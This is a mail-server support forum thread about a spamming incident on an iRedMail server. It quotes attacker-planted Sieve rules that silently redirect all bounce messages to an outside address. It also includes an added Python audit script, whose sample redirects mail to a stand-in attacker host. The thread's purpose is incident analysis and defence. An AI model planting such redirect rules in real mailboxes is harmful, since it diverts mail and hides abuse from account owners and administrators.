1

Topic: spamming issue

==== REQUIRED BASIC INFO OF YOUR IREDMAIL SERVER ====
- iRedMail version (check /etc/iredmail-release): pro latest
- Deployed with iRedMail Easy or the downloadable installer?
- Linux/BSD distribution name and version: debian 9
- Store mail accounts in which backend (LDAP/MySQL/PGSQL): mysql
- Web server (Apache or Nginx): nginx
- Manage mail accounts with iRedAdmin-Pro? yes
- [IMPORTANT] Related original log or error message is required if you're experiencing an issue.
====

Hi,

We had a recent incident of spamming.

On a search we found the following files under

/var/vmail/vmail1/customerdomain.com/user

# ls -la
total 4
drwx------ 3 vmail vmail  75 Jan 31 16:06 .
drwx------ 4 vmail vmail  46 Jan  7 22:11 ..
lrwxrwxrwx 1 vmail vmail  66 Jan  7 22:11 dovecot.sieve -> /var/vmail/vmail1/customerdomain.com/user/sieve/managesieve.sieve
-rw------- 1 vmail vmail 188 Jan  7 23:35 dovecot.svbin
drwx------ 2 vmail vmail  10 Jan  7 22:11 tmp
###############

And in the file managesieve.sieve created above we found the following content:

##################
# rule:[<MAILER-DAEMON>]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[Undeliverable:]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[Undelivered Mail Returned to Sender]
if true
{
        redirect "bharath@ecotechlabs.in";
}
# rule:[MAILER-DAEMON@ns1.MailserServerHostname.net]
if true
{
        redirect "bharath@ecotechlabs.in";
}
###################

After some more searching we found that around 6 other users of different domains had a similar manage.sieve created.

When we tried to access the SOGo URL for a specific user it gave us the following message:

"An external sieve script is active"
and a button to let SOGo handle everything.

Please see the attached image from when we tried to access SOGo for a specific user.

My questions please:

1) Normally when forwarding or a vacation message is set via SOGo, the file that gets created is sogo.sieve.
How did the managesieve.sieve file get created, since this is not present under any of the other users?
Is it some kind of hacking incident?

2) How can we prevent managesieve access for users?

3) Can Roundcube or SOGo be misused to cause this?

Thanks
Rajesh


2

Re: spamming issue

- If you don't open the managesieve port (4190) to the public internet in the firewall, then it must have been created through the Roundcube or SOGo web UI.
- Roundcube creates the sieve file with the file name "managesieve.sieve". So it's very possible that this file was created with Roundcube.

If the user's password is weak, it's very possible that the account was hacked and the sieve rules were created by the cracker.
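
For auditing the other mailboxes, the following is an added example and not part of the original thread or of iRedMail: it walks a mail storage tree and reports Sieve scripts containing an always-firing redirect to an address outside the mailbox's own domain, the pattern quoted in the first post. It assumes the first directory level under the root is the mail domain (as in the path shown above, with `/var/vmail/vmail1` as root); the sample script and its addresses are constructed.

```python
import re
import sys
from pathlib import Path

# Sieve comments: "# ..." lines and /* ... */ blocks.
COMMENT = re.compile(r"^[ \t]*#[^\n]*$|/\*.*?\*/", re.M | re.S)
# Innermost "if/elsif/else <test> { <body> }" blocks; nesting is not modelled.
BLOCK = re.compile(r"\b(if|elsif|else)\b([^{}]*)\{([^{}]*)\}")
REDIRECT = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"')

# Constructed sample in the shape of the script quoted in the thread.
SAMPLE = '''\
# rule:[Undeliverable:]
if true
{
        redirect "collector@attacker.example";
}
# rule:[invoices]
if header :contains "subject" "invoice"
{
        redirect "accounts@customerdomain.com";
}
'''

def find_redirects(script, local_domain):
    """Return one dict per redirect action found in a Sieve script."""
    text = COMMENT.sub("", script)
    # (always_fires, body): "if true" blocks and top-level actions always fire.
    scopes = [(kw == "if" and test.strip().lower() == "true", body)
              for kw, test, body in BLOCK.findall(text)]
    scopes.append((True, BLOCK.sub("", text)))  # may over-report nested rules
    return [{"target": t, "unconditional": always,
             "external": t.rsplit("@", 1)[-1].lower() != local_domain.lower()}
            for always, body in scopes for t in REDIRECT.findall(body)]

def audit_tree(root):
    """Yield (path, finding) for unconditional external redirects under root."""
    root = Path(root)
    for path in sorted(root.rglob("*.sieve")):
        if path.is_symlink():  # dovecot.sieve only points at the real script
            continue
        domain = path.relative_to(root).parts[0]  # assumption: root/<domain>/...
        for f in find_redirects(path.read_text(errors="replace"), domain):
            if f["unconditional"] and f["external"]:
                yield path, f

if __name__ == "__main__":
    for path, f in audit_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: unconditional redirect to {f['target']}")
```

Run it as a user that can read the mail store; each hit is a mailbox whose password should be reset and whose script should be reviewed with the owner.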

3 (edited by RajeshM 2020-02-03 11:22:52)

Re: spamming issue

Thanks.
I have checked by adding filters using Roundcube, and it created managesieve.sieve.

I have disabled Roundcube.

Rajesh